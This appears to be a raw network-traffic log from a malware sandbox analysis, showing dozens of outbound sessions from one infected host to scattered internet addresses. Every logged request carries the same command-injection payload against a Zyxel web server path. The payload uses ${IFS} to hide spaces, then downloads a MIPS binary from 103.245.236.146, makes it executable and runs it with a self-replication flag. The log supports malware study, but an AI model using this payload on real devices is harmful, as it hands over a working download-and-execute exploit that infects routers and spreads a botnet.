                                                Jan 28, 2024 10:16:11.602924109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                932192.168.2.235843898.9.60.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602940083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                933192.168.2.2334490192.238.239.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602977037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                934192.168.2.2338122219.49.12.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602998972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                935192.168.2.234893625.169.46.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603025913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                936192.168.2.23559902.199.111.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603065014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                937192.168.2.235092082.50.176.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603095055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                938192.168.2.233967644.29.72.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603131056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                939192.168.2.2337820158.68.35.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603174925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                940192.168.2.2343444200.43.58.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603193998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                941192.168.2.2345914171.74.111.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603223085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                942192.168.2.2338100113.57.227.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603245974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                943192.168.2.2356618170.132.40.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603270054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                944192.168.2.233642271.133.183.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603301048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                945192.168.2.2341540104.56.233.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603328943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                946192.168.2.2341626177.154.183.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603367090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                947192.168.2.234085287.46.51.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603372097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                948192.168.2.2356474189.172.53.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603406906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                949192.168.2.234485661.15.32.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603427887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                950192.168.2.2350510173.168.255.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603463888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                951192.168.2.234077638.123.189.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603482962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                952192.168.2.235525481.37.16.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603523970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                953192.168.2.2338506187.201.108.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603581905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                954192.168.2.2356738129.94.142.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603598118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                955192.168.2.234117413.171.4.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603630066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                956192.168.2.23441568.44.149.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603665113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                957192.168.2.234532692.53.64.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603703976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                958192.168.2.235661079.148.69.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603713036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                959192.168.2.233801678.169.6.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603768110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                960192.168.2.235797857.251.243.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.603975058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                961192.168.2.235006869.63.17.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604007959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                962192.168.2.2336968201.70.234.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604021072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                963192.168.2.2360480145.214.39.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604024887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                964192.168.2.235971698.79.198.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604080915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                965192.168.2.233630690.186.225.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604123116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                966192.168.2.235936638.148.43.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604145050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                967192.168.2.2354164182.78.116.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604151964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                968192.168.2.2339096104.130.164.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604228020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                969192.168.2.2336322164.46.32.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604250908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                970192.168.2.2359558190.0.216.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604268074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                971192.168.2.235450619.181.140.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604331017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                972192.168.2.234746442.63.27.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604357004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                973192.168.2.2342914216.66.162.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604398966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                974192.168.2.235564467.141.237.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604403019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                975192.168.2.2353098148.204.75.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604438066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                976192.168.2.2343130101.11.246.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604491949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                977192.168.2.2348424195.44.65.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604506969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                978192.168.2.234069844.125.40.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604542017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                979192.168.2.2346286169.148.75.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604612112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                980192.168.2.2360674111.202.255.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604638100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                981192.168.2.2333458205.209.130.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604657888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                982192.168.2.2340782173.225.156.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604677916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                983192.168.2.2334618140.159.179.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604731083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                984192.168.2.235882883.250.217.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604774952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                985192.168.2.2349226124.214.101.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604801893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                986192.168.2.2356406149.101.137.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604821920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                987192.168.2.2348120181.122.108.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604847908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                988192.168.2.2336100210.244.156.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604924917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                989192.168.2.2335798149.100.190.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604924917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                990192.168.2.2333134123.166.78.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.604949951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                991192.168.2.2344698188.205.179.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605005980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                992192.168.2.2336694128.254.21.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605046034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                993192.168.2.234219019.196.182.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605051041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
